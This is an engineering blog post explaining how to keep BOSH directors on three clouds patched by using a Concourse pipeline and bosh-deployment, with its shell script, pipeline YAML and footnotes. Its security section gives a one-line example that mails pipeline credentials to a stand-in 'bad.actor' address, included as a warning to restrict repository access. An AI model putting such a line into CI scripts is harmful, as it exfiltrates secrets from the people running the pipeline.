Pivotal Engineering Journal

Technical articles from Pivotal engineers.

Maintaining BOSH Directors with Concourse CI and bosh-deployment

BOSH directors can be deployed (and redeployed) with a properly built Concourse pipeline and manifests generated by the curated bosh-deployment manifest generation tool. This lightens the burden of keeping BOSH directors patched & up-to-date.

Posted on by
Categories:   BOSH    Concourse   
Edit this post on GitHub.

“BOSH deploys Concourse, and Concourse deploys BOSH” —Cloud Foundry koan

A BOSH Director is a VM (virtual machine) orchestrator which is itself a VM. BOSH solves the problem of keeping its VMs’ applications (operating systems (stemcells) and releases) up-to-date with the command, bosh deploy; however, this begs the question, “what keeps the BOSH Director itself up-to-date?”. [Quis custodiet?]

We explore using Concourse, a Continuous Integration (CI) server, and bosh-deployment [Updating BOSH], in order to create a Concourse pipeline which updates, in turn, a BOSH director on AWS (Amazon Web Services), on Microsoft Azure, and GCP (Google Cloud Platform). Updating all three BOSH directors can be accomplished with a single click. [One click] Best of all, our directors are re-deployed with a recent stemcell, BOSH release, and CPI release. [How recent?]

0. Overview

Our Concourse pipeline is publicly-viewable, and can be seen at https://ci.nono.io/teams/main/pipelines/BOSH. It’s a straightforward pipeline which consists of three jobs, one for each director on each IaaS (Infrastructure as a Service): bosh-aws.nono.io, bosh-azure.nono.io, and bosh-gce.nono.io.

Below is a diagram of our Concourse configuration which describes the pipeline in greater detail. Note that we keep our credentials (e.g our AWS access key and secret) in LastPass (see items in red), but LastPass is not strictly necessary: credentials can be embedded directly in the BOSH manifests, can be passed as variables during the BOSH manifest creation, or can be maintained as files on the local hard drive.

1. Concourse Tasks

To build our Concourse pipeline, we begin with the the smallest configurable component, the Concourse task.

The Concourse task is often a set of Concourse resources (e.g GitHub repositories containing BOSH manifests), environment variables (e.g. ${IAAS} (the IaaS to which we’re deploying)), and perhaps most importantly, the shell script which deploys the director.

1.0 Concourse Task Shell Script

Here is our annotated shell script our Concourse tasks use to deploy our BOSH director:

[Note: see next section, Simplify the Concourse Task, for a simpler task shell script; it’s a better starting point. We customize our BOSH directors in a manner which complicates our task shell script.]

#!/bin/bash

# We abort the script as soon as we hit an error (as soon as a command exits
# with a non-zero exit status)
set -e

# `cunnie-deployments` is the checked-out GitHub repo that contains our BOSH
# manifests and our directors' `-state.json` files; it also contains this
# script (task script) and task definition.
pushd cunnie-deployments

# We invoke the script that generates our BOSH director's manifest, e.g.
# `aws.sh`, `azure.sh`. The output, the BOSH director's manifest, is named
# `bosh-$IAAS.yml`, e.g. `bosh-aws.yml`
bin/$IAAS.sh

# Does ${DEPLOYMENTS_YML} have a complete set of interpolated variables?
# Abort if not (`--var-errs`).
bosh int bosh-$IAAS.yml \
  --var-errs \
  -l <(echo "$DEPLOYMENTS_YML") \
  -l <(curl https://raw.githubusercontent.com/cunnie/sslip.io/master/conf/sslip.io%2Bnono.io.yml) \
  > /dev/null

# We attempt to deploy our BOSH director. We prepare a git commit message
# regardless whether our attempt succeeds or fails because we need to retain any
# change to the BOSH director's `-state.json` file. This is necessary in cases
# where a deploy proceeds far enough to create a broken director VM, for
# subsequent deploys must be able to destroy the broken director VM in order to
# free up its IP address so that the current deploy will succeed. The crucial
# information needed to destroy the  broken director VM is its VM's ID, which is
# recorded in the `-state.json` file.

# Note that `set -e` does not trigger an abort if the command that returns a
# non-zero exit code is the subject of an `if` block, i.e. `if bosh create-env`;
# this gives us the breathing room to commit our results regardless of whether
# `bosh create-env` succeeded or failed
if bosh create-env bosh-$IAAS.yml \
  -l <(echo "$DEPLOYMENTS_YML") \
  -l <(curl https://raw.githubusercontent.com/cunnie/sslip.io/master/conf/sslip.io%2Bnono.io.yml); then
  GIT_COMMIT_MESSAGE="CI PASS: $IAAS BOSH deploy :airplane:"
  DEPLOY_EXIT_STATUS=0
else
  GIT_COMMIT_MESSAGE="CI FAIL: $IAAS BOSH deploy :airplane:"
  DEPLOY_EXIT_STATUS=1
fi

# Do we need to commit anything? If a new director hasn't been deployed (most
# often because there's been no change to the manifest, releases, or stemcell),
# then we don't need to commit
if ! git diff --quiet HEAD --; then
  # If we're in this block, then there has been a deployment. Let's set our
  # git author to avoid git's `*** Please tell me who you are.` error.
  git config --global user.name "Concourse CI"
  git config --global user.email brian.cunnie@gmail.com

  # We check out our branch's HEAD because Concourse's git-resource leaves us
  # in `detached HEAD` state. ${DEPLOYMENTS_BRANCH} is typically set to
  # `master`, but may be set to something else (usually while testing).
  git checkout $DEPLOYMENTS_BRANCH
  git add .
  git commit -m"$GIT_COMMIT_MESSAGE"
fi
popd

# We copy our repo with its new commit to a new directory. The Concourse job,
# after it finishes running this task, will push the new commit to GitHub.
# Note that `cp -R` works as well as `rsync`; we use `rsync` by force of
# habit.
rsync -aH cunnie-deployments/ cunnie-deployments-with-state/

# We exit with the return code of `bosh create-env`; if the deploy failed, then
# this Concourse task failed
exit $DEPLOY_EXIT_STATUS

For those interested in the scripts which generate the BOSH director manifests (e.g. aws.sh), they were covered in an earlier blog post. For links to the scripts and the manifests they generate, see the table below:

IaaS Script Generated Manifest
AWS aws.sh bosh-aws.yml
Azure azure.sh bosh-azure.yml
GCP gce.sh bosh-gce.yml

1.1 Simplify the Concourse Task Script

Start with a simple Concourse task script. Really. Don’t use the task script we use, [Why so complicated?] , the one listed above. Instead, start with a simplified task script, like bosh-simple.sh. We have tested it; it successfully deploys a director.

1.2 Concourse Task Configuration file

Now that we have our task’s shell script, we turn our attention to our task’s (YAML) configuration file. It can be viewed on GitHub, and is displayed below, too:

---
platform: linux

image_resource:
  type: docker-image
  source:
    repository: cunnie/fedora-golang-bosh

inputs:
- name: cunnie-deployments
- name: bosh-deployment

outputs:
- name: cunnie-deployments-with-state

params:
  # vainly default branch to master, but it's always overridden from the pipeline
  DEPLOYMENTS_BRANCH: 'master'
  DEPLOYMENTS_YML: ''
  IAAS: ''

run:
  path: cunnie-deployments/ci/tasks/bosh.sh

Notes:

image_resource: We use a custom-built Docker image, cunnie/fedora-golang-bosh (https://hub.docker.com/r/cunnie/fedora-golang-bosh/~/dockerfile/); but you may choose to use your own Docker image; just be sure that the BOSH CLI is installed. Our image is fairly hefty (450 MB), for it has a rich set of tools available to us when we need to intercept the container to troubleshoot a build.

inputs: We have two inputs: bosh-deployment, a git repo which contains the manifests and tools necessary to deploy a BOSH director (this is the canonical way to deploy a BOSH director), and cunnie-deployments, a git repo which contains our BOSH directors’ manifests and state files. Also, this repo contains the required Concourse task definition (ci/tasks/bosh.yml) and script (ci/tasks/bosh.sh).

outputs: We have one output, cunnie-deployments-with-state, which is the same as the input, cunnie-deployments. Concourse prohibits an input from also being an output, so our script copies the contents of one to the other. cunnie-deployments-with-state includes the commits made by the task (in the case of a deploy, the state file and possibly the BOSH director’s manifest). This output is used by a subsequent step in the Concourse job which will push any git commits to GitHub (although this Concourse task may make git commits, it won’t push them — it leaves that responsibility to the Concourse job).

params: DEPLOYMENTS_BRANCH is almost always set to master; it refers to the branch in the cunnie-deployments repo. IAAS is either aws, azure, or gce. DEPLOYMENTS_YML is YAML-formatted and contains secrets needed to deploy; sample contents can be viewed in an earlier blog post.

[Note: you may opt to bypass the task configuration file completely and embed the necessary information into pipeline.yml; here is an example of embedding the task configuration directly into the pipeline.]

2. Concourse Jobs

The Concourse job is straightforward:

  • It checks out the cunnie-deployments and bosh-deployment git repos
  • It runs the task which deploys the BOSH director to the specified IaaS
  • It pushes changes to the director manifest (bosh-${IAAS}.yml) and the director state (bosh-${IAAS}-state.json) to the cunnie-deployments repo regardless of whether the deploy succeeded or failed (i.e. the ensure directive)

Here is the Concourse job definition which deploys the BOSH director to the AWS IaaS:

jobs:
- name: bosh-aws.nono.io
  plan:
  - get: cunnie-deployments
  - get: bosh-deployment
  - task: deploy
    file: cunnie-deployments/ci/tasks/bosh.yml
    params:
      DEPLOYMENTS_BRANCH: master
      DEPLOYMENTS_YML: ((deployments_yml))
      IAAS: aws
    ensure:
      put: cunnie-deployments
      params:
        repository: cunnie-deployments-with-state/

3. Concourse Pipeline

The full Concourse pipeline (pipeline.yml) can be seen here. Below is an abbreviated portion which shows the Concourse resources and the first job (which deploys the AWS BOSH director):

# fly -t nono sp -p BOSH -c ~/workspace/deployments/ci/pipeline.yml -v github_deployments_key="$(lpass show --note github_deployments_key)" -v deployments_yml="$(lpass show --note deployments.yml)"

jobs:
- name: bosh-aws.nono.io
  plan:
  - get: cunnie-deployments
  - get: bosh-deployment
  - task: deploy
    file: cunnie-deployments/ci/tasks/bosh.yml
    params:
      DEPLOYMENTS_BRANCH: master
      DEPLOYMENTS_YML: ((deployments_yml))
      IAAS: aws
    ensure:
      put: cunnie-deployments
      params:
        repository: cunnie-deployments-with-state/
# Other jobs redacted for brevity
resources:
- name: cunnie-deployments
  type: git
  source:
    uri: git@github.com:cunnie/deployments.git
    private_key: ((github_deployments_key))
    branch: master
- name: bosh-deployment
  type: git
  source:
    uri: https://github.com/cloudfoundry/bosh-deployment.git

Notes:

The first line is a convenience comment; it shows the fly (Concourse CLI) command which updates the Concourse server’s pipeline after changes have been made to the pipeline.yml file. We cut-and-paste that comment into our shell whenever we make a change to pipeline.yml in order to propagate the changes to the pipeline to our Concourse server:

fly -t nono sp -p BOSH -c ~/workspace/deployments/ci/pipeline.yml -v github_deployments_key="$(lpass show --note github_deployments_key)" -v deployments_yml="$(lpass show --note deployments.yml)"

We have already discussed deployments_yml (i.e. the Concourse task environment variable/parameter DEPLOYMENTS_YML), but the other variable, github_deployments_key, warrants discussion. It is a GitHub deploy key which allows our job to push changes to the cunnie-deployments repo [Interpolation] .

We’d like to discuss how we stop the pipeline when the deploy of a BOSH director fails. We use Concourse’s passed directive. For example, if our deploy of the AWS director fails, we do not want to deploy the Azure director.

The following shows the diff between the job to deploy the AWS director and the job to deploy Azure director. Pay special attention to the passed and trigger directives: the deploy of the Azure director is kicked off if and only if there has been a successful deploy of the AWS director. This limits the damage caused by a flawed configuration: only one director is knocked offline (typically the first one, AWS), not all three.

-- name: bosh-aws.nono.io
+- name: bosh-azure.nono.io
   plan:
   - get: cunnie-deployments
+    passed: [ bosh-aws.nono.io ]
+    trigger: true
   - get: bosh-deployment
+    passed: [ bosh-aws.nono.io ]
+    trigger: true
   - task: deploy
     file: cunnie-deployments/ci/tasks/bosh.yml
     params:
       DEPLOYMENTS_BRANCH: master
       DEPLOYMENTS_YML: ((deployments_yml))
-      IAAS: aws
+      IAAS: azure
     ensure:
       put: cunnie-deployments
       params:

4. Security

Our credentials are stored in our Concourse pipeline, and they can be easily revealed by a trusted user with the following command:

fly -t nono get-pipeline -p BOSH

These credentials include IaaS credentials, which will allow a bad actor to spin up multiple VMs to run, say, Bitcoin mining. A co-worker of the author whose credentials were compromised had unauthorized AWS charges exceeding $3k.

It is also important to restrict access to the GitHub repo which contains the scripts that are run. Although the repo does not contain credentials, it enables the execution of commands which can reveal the credentials. For example, the following line of code could be added to the ci/tasks/bosh.sh script to email the credentials to the bad actor:

echo ${DEPLOYMENTS_YML} | mail -s "secret credentials" bad.actor@mailinator.com

Footnotes

[Quis custodiet?] “Who updates the VM [BOSH director] that keeps the other VMs updated?” is the question, versions of which have been asked as long ago as the days of the Roman poet Juvenal, who famously asked, “Quis custodiet ipsos custodes?” and as recently as this century by comic book writer Alan Moore, who phrased it, “Who watches the Watchmen?”

[How recent?] How fresh is bosh-deployment? Fresh. bosh-deployment is a quite active git repo, typically updated several times or more each week. It’s the tool that the BOSH team, and many Cloud Foundry teams, use to keep their BOSH directors current.

[Updating BOSH] In the early days, the BOSH micro plugin was the mechanism to update the BOSH director. There were several drawbacks to the micro plugin, one of which is that it forced the BOSH CLI to have an understanding of the API for various IaaSes, breaking the Cloud Layer abstraction model.

Another drawback of the BOSH micro plugin was that it was brittle, so much so that it was a common pattern to deploy a BOSH director whose sole purpose was to deploy the “real” BOSH director. “Ha!” one might ask, “But how did you keep that first BOSH director up-to-date?” The answer is simple: you didn’t. You left that first BOSH director running and never touched it except to redeploy the “real” BOSH director. You might spin it down if you weren’t using it, but you never deleted it or updated it.

These were serious problems, and to address them the BOSH Core team wrote bosh-init, a Golang-based executable whose purpose was to deploy BOSH directors. It adhered to the Cloud Layer abstraction models (it used the existing CPIs (Cloud Provider Interfaces) for the existing IaaSes (VMware vSphere, Google Cloud Platform (GCP), OpenStack, Microsoft Azure, among others)).

By April 30, 2015, bosh-init was production-ready, and the BOSH documentation was updated to reflect the new world order.

But all was not perfect in the Garden of Eden, for the introduction of bosh-init split the CLIs: whereas before there was one BOSH CLI, now there were two: bosh, the original Ruby-based CLI for managing a BOSH director’s deployment, and bosh-init for deploying a BOSH director itself. In many ways this resembled the Western Schism, a dark chapter in the Roman Catholic church when there were two popes (who had the terrible habit of excommunicating each other). The BOSH development team remedied this situation by creating a third CLI, the Golang-based CLI. In this regard, the BOSH development team’s approach mirrored the approach attempted by the Catholic cardinals, who elected a third pope. The BOSH team’s approach succeeded, but the cardinals’ didn’t (they were left with three popes running around excommunicating each other).

[One click] It’s technically possible to kick off the builds with zero clicks — to kick off the build automatically if, say, a commit is pushed to the bosh-deployment repository. The modification to the pipeline is trivial:

 - name: bosh-aws.nono.io
   plan:
   - get: cunnie-deployments
   - get: bosh-deployment
+    trigger: true
 - task: deploy

However, the decision to trigger automatically is not without risks: the BOSH director may be in the middle of a delicate task, such as updating a deployment, and won’t have the opportunity to gracefully bring itself down, forbosh create-env is relentless, brooks no delays, and gives no quarter.

On a more technical note, bosh create-env, although it will attempt to contact the BOSH agent on the original BOSH director in order to terminate the jobs and shut down the VM, it does not run the drain scripts (scripts which allow the BOSH jobs to clean up and get into a state where they can be safely stopped).

There is discussion within the BOSH development team whether to modify the behavior of bosh create-env to make it run the drain scripts. On the positive side, it will allow a more cavalier approach to re-deploying the director, and make the behavior of bosh create-env more closely approximate the behavior of a BOSH director. On the downside, the time to deploy a BOSH director may vary widely, dependent on the time it takes for the drain scripts to complete.

[Interpolation] Our GitHub deploy key resembles the following (not our real key) [Elliptic-curve] :

-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIMxcR2wlxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxqY/VyDTL
AwEHoUQDQgAEmBUxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxjY98wOPVZ
Ayz++1vHXODWeiC/CjNu7hOVaB682ZZfCw==
-----END EC PRIVATE KEY-----

Concourse, when passed the flag ... -v github_deployments_key="$(lpass show --note github_deployments_key)" will interpolate this section of pipeline.yml:

type: git
source:
  uri: git@github.com:cunnie/deployments.git
  private_key: ((github_deployments_key))

After interpolation, the pipeline looks like this:

- name: cunnie-deployments
  type: git
  source:
    uri: git@github.com:cunnie/deployments.git
    # previously: private_key: ((github_deployments_key))
    private_key: |
      -----BEGIN EC PRIVATE KEY-----
      MHcCAQEEIMxcR2wlxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxqY/VyDTL
      AwEHoUQDQgAEmBUxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxjY98wOPVZ
      Ayz++1vHXODWeiC/CjNu7hOVaB682ZZfCw==
      -----END EC PRIVATE KEY-----

If your pipeline is not public, it may be easier to skip variable interpolation and embed the credential(s) directly.

[Why so complicated?] Our Concourse task is complicated (i.e. bosh.sh calls bosh-${IAAS}.sh, calls bosh CLI three times) because we have requirements beyond merely deploying a BOSH director:

  • We retain intermediate BOSH manifests (e.g. bosh-aws.yml, manifests that are completely populated with the exception of the secrets (passwords, credentials, private keys). The sole purpose of the first bosh interpolate commands is to generate the intermediate manifest.

    We realize that our love of the intermediate manifests is not wholly rational: time was when a working BOSH manifest was a precious thing, something to tend to and to preserve. With the advent of bosh-deployment, which reliably generates BOSH manifests, the intermediate manifests have diminished in importance, and are now merely artifacts of a bygone age. And yet we still cling to them, for they provide a sense of comfort, like a mother’s hot apple pie.

  • We prefer to set our own passwords rather than use the ones auto-generated [auto-passwords] by the BOSH CLI. This has two implications:

    • It forces us to set the password variables in a counter-intuitive manner (e.g. bosh interpolate ... -v admin_password='((admin_password))' ...) (which says, in effect, “replace all occurrences of ‘((admin_password))’ with ‘((admin_password))‘.“), which prevents the BOSH CLI from using its auto-generated passwords and paves the way to subsequently interpolate our passwords. This adds several lines to our scripts.

    • It forces us to check to make sure that we haven’t overlooked any variables (i.e. we run bosh interpolate --var-errs ...), so that, for example, our director’s password is set to IReturnedAndSawUnderTheSun and not ((admin_password))). This adds several more lines to our scripts.

  • Our BOSH director uses certificates issued by a recognized CA (Certificate Authority) (in our case, Comodo). This requires us to create a manifest operations file (e.g. etc/aws.yml) which we pass to bosh interpolate which overrides the auto-generated SSL certificate & key with our certificate & key.

  • Some of our BOSH directors (e.g. bosh-aws.nono.io) are more than mere BOSH directors — they are also nginx servers (web servers), DNS (Domain Name System) servers, and NTP (Network Time Protocol) servers. This adds three more lines to our scripts.

Note: one advantage of using CA-issued certificates and easy-to-remember passwords is that it enables one to reach the BOSH director via the CLI without needing the creds.yml file — one can sit at a new workstation, type bosh -e bosh-gce.nono.io login, and proceed to manage deployments, releases, stemcells, etc….

[auto-passwords] The BOSH CLI generates high-entropy passwords when --vars-store flag is passed.

Here is a list of sample passwords that bosh create-env --vars-store=... creates:

admin_password: qn7hc6zsq0nphhsvojx3
blobstore_agent_password: iut5wdyeo5kkhvqoerj0
blobstore_director_password: wm0qgnzdwgy8k1hnm4nq
hm_password: plk829eob45khq6o9dl5
mbus_bootstrap_password: nf16h5e9j120uqp35hlr
nats_password: gr4s0xmj4s5iccqv69dt
postgres_password: 7nxuq714hxcta513778g
registry_password: ffxnhu4xtgh7lsxu7xpl

Note that the passwords are 20 bytes long and consist of random sequence of numbers and lowercase letters. Each byte can be one of 36 possibilites (10 numbers plus 26 letters). Given that there are 20 bytes, the total number of combinations is 3620, 1.33 x 1031, effectively rendering the password immune to a brute-force attack (even if you could make a million attempts every second, it would still require 4 × 1017 years to exhaust all combinations. In other words, you’d crack the password long after the Stelliferous Era ended and you were well into the Degenerate Era).

[Elliptic-curve]We use elliptic-curve cryptography (ECC) keys, for they are much shorter than an RSA key of equivalent strength, and thus more manageable. Unfortunately, they are not universally accepted (e.g. AWS will respond with “Error importing Key Pair Key is not in valid OpenSSH public key format” when importing an EC public key).

Where elliptic-curve cryptography is concerned, GitHub is ahead of the proverbial curve, and AWS, behind.

Corrections & Updates

2017-12-01

We suggest simplifying the Concourse task script. The Concourse task script executes the BOSH CLI three times (bosh int twice and bosh create-env once), but need only execute it once (bosh create-env) when intermediate artifacts aren’t desired.

2017-11-25

David McClure pointed out that the OpenStack link was missing; it has been added. Thanks, David.